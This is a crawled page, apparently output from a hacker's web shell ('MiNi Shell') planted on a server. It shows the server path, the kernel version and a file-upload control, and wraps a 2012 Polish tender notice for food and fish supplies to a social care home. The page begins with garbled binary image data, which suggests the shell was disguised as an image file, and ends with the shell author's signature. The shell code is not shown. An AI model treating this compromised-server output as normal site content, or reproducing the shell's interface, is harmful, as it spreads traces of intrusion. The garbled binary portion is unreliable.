JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121212/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121212/506932-N-2012.html

<p class="kh_header"><b>Szadek: Zakup i dostawy różnych artykułów spożywczych, ryb i przetworów rybnych dla Domu Pomocy Społecznej w Przatówku Przatówek 1, 98-240 Szadek.</b><br>
<b>Numer ogłoszenia: 506932 - 2012; data zamieszczenia: 12.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Przatówek 1, 98-240 Szadek, woj. łódzkie, tel. 43 675 12 29, faks 43 675 12 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.dpsprzatowek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawy różnych artykułów spożywczych, ryb i przetworów rybnych dla Domu Pomocy Społecznej w Przatówku Przatówek 1, 98-240 Szadek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakupu i dostawy różnych artykułów spożywczych, ryb i przetworów rybnych dla Domu Pomocy Społecznej w Przatówku Przatówek 1, 98-240 Szadek.
Oznaczenie zadania za pomocą Wspólnego Słownika Zamówień (CPV): 
Część pierwsza.
Różne produkty spożywcze 15800000-6 
Część druga.
Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone 15240000-2
Ryby mrożone, filety rybne i pozostałe mięso ryb 15220000-6
2. Artykuły spożywcze, stanowiące przedmiot zamówienia muszą w pochodzić z bieżącej produkcji oraz utrzymywać ustalone standardy jakościowe.
3. Zamawiający może zmniejszyć ilość oraz zakres zamawianego asortymentu w zależności od rzeczywistego zapotrzebowania, w ilości nie przekraczającej jednak 20% wartości podanych                 w tabeli pkt 8.
4. Pracownik Domu Pomocy Społecznej w Przatówku odpowiedzialny za składanie zamówień, zamawia ilości asortymentu potrzebne w określonych dniach tygodnia Zamówienie sporządzane jest w formie pisemnej i przesyłane do realizującego faksem, pocztą elektroniczną, w ustalony
z Wykonawcą dzień tygodnia. W uzasadnionych przypadkach dopuszcza się możliwość stosowania zamówienia telefonicznego.
5. Wykonawca dowozi zamówioną na dany dzień ilość asortymentu do siedziby zamawiającego swoim środkiem transportu w godzinach od: 700 - 1300.
6. Płatności za zamówiony towar dokonuje się przelewem w terminie 14 dni po otrzymaniu faktury. Wykonawca wystawia i doręcza Zamawiającemu fakturę za towar, najpóźniej dwa dni po jego dostarczeniu.
7. Wybór Wykonawcy nastąpi po zapoznaniu się z dokumentacją przetargową oferentów.
8. W wyborze ofert istotną będzie cena na wyszczególnione w poniższych tabelach artykuły:
Część pierwsza.
Różne produkty spożywcze
L.P.
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
    1.
Ananasy w puszce
2,50 kg
    2.
Aromaty do ciasta 5 g
85 szt.
    3.
Barszcz biały
90 l
    4.
Biszkopty okrągłe
40,00 kg
    5.
Brzoskwinie puszka
5,00 kg
    6.
Budynie
85,00 kg
    7.
Bułka tarta
110,00 kg
    8.
Chrzan
5,00 kg
    9.
Ciastka herbatniki
12,00 kg
  10.
Ciastka luzem
85,00 kg
  11.
Cukier
1950,00 kg
  12.
Cukier puder
40,00 kg
  13.
Cukier waniliowy
11,00 kg
  14.
Cukierki czekoladowe luzem
85,00 kg
  15.
Cynamon
1,00 kg
  16.
Drożdże
20,00 kg
  17.
Dżem brzoskwiniowy
45,00 kg
  18.
Dżem truskawkowy
135,00 kg
  19.
Dżem wiśniowy
135,00 kg
  20.
Dżem z czarnej porzeczki
45,00 kg
  21.
Galaretki owocowe
85,00 kg
  22.
Groszek konserwowy
65,00 kg
  23.
Herbata expresowa
0,3 kg
  24.
Herbata granulowana
50,00 kg
  25.
Jagły
1,00 kg
  26.
Jajka - wielkość L
19 000 szt
  27.
Kakao
6,00 kg
  28.
Kasza manna
110,00 kg
  29.
Kawa naturalna mielona
1,50 kg
  30.
Kawa rozpuszczalna zbożowa
50,00 kg
  31.
Ketchup łagodny
70,00 kg
  32.
Kisiel
135,00 kg
  33.
Kleik ryżowy
14,00 kg
  34.
Kompot owocowy 0,9 l
1520 szt
  35.
Koncentrat pomidorowy
90 ,00 kg
  36
Krakersy
60,00 kg
  37
Kukurydza konserwowa
2,00 kg
  38.
Kwasek cytrynowy
4,00 kg
  39
Liście laurowe
1,00 kg
  40.
Majeranek
3,00 kg
  41.
Majonez
60,00 kg
  42.
Mak
21,00 kg
  43.
Makaron nitki
100,00 kg
  44.
Makaron świderki
550,00 kg
  45.
Margaryna Kasia lub równoważna
2,00 kg
  46.
Margaryna Palma
25,00 kg
  47.
Margaryna zwykła
20,00 kg
  48.
Marmolada
10,00 kg
  49.
Masło roślinne
20,00 kg
  50.
Mąka pszenna - typ 500
1100,00 kg
  51.
Mąka pszenna tortowa
100,00 kg
  52.
Mąka ziemniaczana
50,00 kg
  53.
Migdały płatki
0,20 kg
  54.
Miód sztuczny
4,00 kg
  55.
Mleko pełne w proszku
85,00 kg
  56.
Mleko skondensowane
2,00 kg
  57.
Musztarda
43,00 kg
  58.
Nać pietruszki - suszona
0,50 kg
  59.
Ocet
45 l
  60.
Ogórki konserwowe 0,9
3 szt
  61.
Olej rzepakowy
180 l
  62.
Orzechy włoskie
0,80 kg
  63.
Paluszki słone
43,00 kg
  64.
Papryka konserwowa 0,9
80 szt
  65.
Papryka mielona ostra
0,50 kg
  66.
Papryka mielona słodka
2,00 kg
  67.
Pieprz mielony
5,00 kg
  68.
Pieprz ziarnisty
3,00 kg
  69.
Pierogi z kapustą i grzybami, serem
5, 00 kg
  70.
Płatki kukurydziane
85,00 kg
  71.
Płatki owsiane
40,00 kg
  72.
Proszek do pieczenia
1,50 kg
  73.
Przecier ogórkowy
25,00 kg
  74.
Przecier szczawiowy
25,00 kg
  75.
Przyprawa do bigosu
0,50 kg
  76.
Przyprawa do flaków
1,00 kg
  77.
Przyprawa do kiszonych ogórków
3,50 kg
  78.
Przyprawa do kurczaka
1,00 kg
  79.
Przyprawa grilowa
0,25 kg
  80.
Przyprawa w płynie
70 l
  81.
Przyprawa warzywna
27,00 kg
  82.
Rodzynki
6,50 kg
  83.
Ryż
220,00 kg
  84.
Serki topione
180,00 kg
  85.
Smalec
55,00 kg
  86.
Soda spożywcza
2,00 kg
  87.
Sól jodowana
366,00 kg
  88.
Suchary delikatesowe
65,00 kg
  89.
Susz owocowy
2,00 kg
  90.
Syrop owocowy
90 l
  91.
Śmietanka fix
1,00 kg
  92.
Wafle luzem
100,00 kg
  93.
Wiórki kokosowe
1,50 kg
  94.
Ziele angielskie
1,60 kg
  95.
Żelatyna spożywcza
4,00 kg

















Część druga.
Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone
Ryby mrożone, filety rybne i pozostałe mięso ryb
L.p
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
1
Filet z miruny
370,00 kg
2
Filet z mintaja
95,00 kg
3
Filet śledziowy
150,00 kg
4
Makrela wędzona
65,00 kg
5
Paluszki rybne
100,00 kg
6
Paprykarz szczeciński
72,00 kg
7
Ryby w pomidorach
190,00 kg
8
Sałatka śledziowa
61,00kg
9
Śledź po kaszubsku
1,00 kg
10
Tuńczyk w sosie własnym
0,6 kg
V. Termin realizacji zamówienia:
				od 01.01.2013 r. do 31.12.2013 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.24.00.00-2, 15.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Przewiduje się możliwość zmiany istotnych postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru zgodnie z warunkami:
a) w zakresie zmiany wynagrodzenia (ceny podanej w ofercie) w przypadku zmiany
stawek podatku VAT;
b) w zakresie zmiany ilości asortymentu będącego przedmiotem zamówienia (zakresu zamówienia) w przypadku konieczności zmniejszenia ilości zamawianego asortymentu, stosownie do potrzeb, jednak nie więcej niż 20% wartości wymienionych w tabeli Formularza cenowego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dpsprzatowek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Przatówku
Przatówek 1
98-240 Szadek
tel/fax. (043)  675-12-29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2012 godzina 08:30, miejsce: Dom Pomocy Społecznej w Przatówku
Przatówek 1
98-240 Szadek sekretariat pok. nr. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P.
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
    1.
Ananasy w puszce
2,50 kg
    2.
Aromaty do ciasta 5 g
85 szt.
    3.
Barszcz biały
90 l
    4.
Biszkopty okrągłe
40,00 kg
    5.
Brzoskwinie puszka
5,00 kg
    6.
Budynie
85,00 kg
    7.
Bułka tarta
110,00 kg
    8.
Chrzan
5,00 kg
    9.
Ciastka herbatniki
12,00 kg
  10.
Ciastka luzem
85,00 kg
  11.
Cukier
1950,00 kg
  12.
Cukier puder
40,00 kg
  13.
Cukier waniliowy
11,00 kg
  14.
Cukierki czekoladowe luzem
85,00 kg
  15.
Cynamon
1,00 kg
  16.
Drożdże
20,00 kg
  17.
Dżem brzoskwiniowy
45,00 kg
  18.
Dżem truskawkowy
135,00 kg
  19.
Dżem wiśniowy
135,00 kg
  20.
Dżem z czarnej porzeczki
45,00 kg
  21.
Galaretki owocowe
85,00 kg
  22.
Groszek konserwowy
65,00 kg
  23.
Herbata expresowa
0,3 kg
  24.
Herbata granulowana
50,00 kg
  25.
Jagły
1,00 kg
  26.
Jajka - wielkość L
19 000 szt
  27.
Kakao
6,00 kg
  28.
Kasza manna
110,00 kg
  29.
Kawa naturalna mielona
1,50 kg
  30.
Kawa rozpuszczalna zbożowa
50,00 kg
  31.
Ketchup łagodny
70,00 kg
  32.
Kisiel
135,00 kg
  33.
Kleik ryżowy
14,00 kg
  34.
Kompot owocowy 0,9 l
1520 szt
  35.
Koncentrat pomidorowy
90 ,00 kg
  36
Krakersy
60,00 kg
  37
Kukurydza konserwowa
2,00 kg
  38.
Kwasek cytrynowy
4,00 kg
  39
Liście laurowe
1,00 kg
  40.
Majeranek
3,00 kg
  41.
Majonez
60,00 kg
  42.
Mak
21,00 kg
  43.
Makaron nitki
100,00 kg
  44.
Makaron świderki
550,00 kg
  45.
Margaryna Kasia lub równoważna
2,00 kg
  46.
Margaryna Palma
25,00 kg
  47.
Margaryna zwykła
20,00 kg
  48.
Marmolada
10,00 kg
  49.
Masło roślinne
20,00 kg
  50.
Mąka pszenna - typ 500
1100,00 kg
  51.
Mąka pszenna tortowa
100,00 kg
  52.
Mąka ziemniaczana
50,00 kg
  53.
Migdały płatki
0,20 kg
  54.
Miód sztuczny
4,00 kg
  55.
Mleko pełne w proszku
85,00 kg
  56.
Mleko skondensowane
2,00 kg
  57.
Musztarda
43,00 kg
  58.
Nać pietruszki - suszona
0,50 kg
  59.
Ocet
45 l
  60.
Ogórki konserwowe 0,9
3 szt
  61.
Olej rzepakowy
180 l
  62.
Orzechy włoskie
0,80 kg
  63.
Paluszki słone
43,00 kg
  64.
Papryka konserwowa 0,9
80 szt
  65.
Papryka mielona ostra
0,50 kg
  66.
Papryka mielona słodka
2,00 kg
  67.
Pieprz mielony
5,00 kg
  68.
Pieprz ziarnisty
3,00 kg
  69.
Pierogi z kapustą i grzybami, serem
5, 00 kg
  70.
Płatki kukurydziane
85,00 kg
  71.
Płatki owsiane
40,00 kg
  72.
Proszek do pieczenia
1,50 kg
  73.
Przecier ogórkowy
25,00 kg
  74.
Przecier szczawiowy
25,00 kg
  75.
Przyprawa do bigosu
0,50 kg
  76.
Przyprawa do flaków
1,00 kg
  77.
Przyprawa do kiszonych ogórków
3,50 kg
  78.
Przyprawa do kurczaka
1,00 kg
  79.
Przyprawa grilowa
0,25 kg
  80.
Przyprawa w płynie
70 l
  81.
Przyprawa warzywna
27,00 kg
  82.
Rodzynki
6,50 kg
  83.
Ryż
220,00 kg
  84.
Serki topione
180,00 kg
  85.
Smalec
55,00 kg
  86.
Soda spożywcza
2,00 kg
  87.
Sól jodowana
366,00 kg
  88.
Suchary delikatesowe
65,00 kg
  89.
Susz owocowy
2,00 kg
  90.
Syrop owocowy
90 l
  91.
Śmietanka fix
1,00 kg
  92.
Wafle luzem
100,00 kg
  93.
Wiórki kokosowe
1,50 kg
  94.
Ziele angielskie
1,60 kg
  95.
Żelatyna spożywcza
4,00 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone
Ryby mrożone, filety rybne i pozostałe mięso ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone
Ryby mrożone, filety rybne i pozostałe mięso ryb
L.p
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
1
Filet z miruny
370,00 kg
2
Filet z mintaja
95,00 kg
3
Filet śledziowy
150,00 kg
4
Makrela wędzona
65,00 kg
5
Paluszki rybne
100,00 kg
6
Paprykarz szczeciński
72,00 kg
7
Ryby w pomidorach
190,00 kg
8
Sałatka śledziowa
61,00kg
9
Śledź po kaszubsku
1,00 kg
10
Tuńczyk w sosie własnym
0,6 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.24.00.00-2, 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com